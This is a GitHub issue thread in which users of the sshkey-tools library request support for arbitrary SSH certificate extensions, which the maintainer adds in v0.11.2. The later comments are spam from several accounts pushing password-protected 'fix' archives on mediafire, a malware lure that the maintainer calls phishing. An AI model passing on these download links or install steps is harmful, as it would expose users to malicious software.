### ISSUE TITLE
Allow custom extensions

### ISSUE THREAD

**Issue by pjcdawkins** [scheiblingco/sshkey-tools#117]
The ExtensionsField only [allows a fixed list of flags](https://github.com/scheiblingco/sshkey-tools/blob/da11f4c5db502cf19aee9fce884ca867df1d8aff/src/sshkey_tools/fields.py#L1163-L1170) but the protocol allows for [custom options](https://github.com/openssh/openssh-portable/blob/aee54878255d71bf93aa6e91bbd4eb1825c0d1b9/PROTOCOL.certkeys#L278-L282).

The OpenSSH `ssh-keygen` tool allows arbitrary extensions (see manual extract below). It'd be great if this library could do the same.

```
       extension:name[=contents]
               Includes  an  arbitrary  certificate  critical option or extension.  The specified name should include a domain suffix, e.g. “name@example.com”.  If contents is specified
               then it is included as the contents of the extension/option encoded as a string, otherwise the extension/option is created with no contents (usually indicating  a  flag).
               Extensions may be ignored by a client or server that does not recognise them, whereas unknown critical options will cause the certificate to be refused.
```

**Comment by scheibling** [comment]
That sounds reasonable, I'll remove that validation when I get a chance

Do you think it would be reasonable to validate the option name as specified in the standard (ends with @somedomain.net), or are you using options that are not following this naming scheme? Haven't used that feature a lot personally so don't have great insight into how it's being used generally

**Comment by pjcdawkins** [comment]
We are using that naming scheme. But the protocol has it as "should", which I think means implementers can choose to ignore it so long as they have thought about it, similar to "SHOULD" in RFC 2119 (https://datatracker.ietf.org/doc/html/rfc2119#section-3). And I guess that means we'd want to allow any extension name in sshkey-tools.

**Comment by scheibling** [comment]
Sounds fair, I'll remove that validation. Should be up in a short while

**Comment by scheibling** [comment]
Resolved through #119 in v0.11.2

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by pjcdawkins** [comment]
> Resolved through https://github.com/scheiblingco/sshkey-tools/pull/119 in v0.11.2

Amazing, thank you

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scheibling** [comment]
Note: deleted an obvious phishing link from some random account (MirsonMboa)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
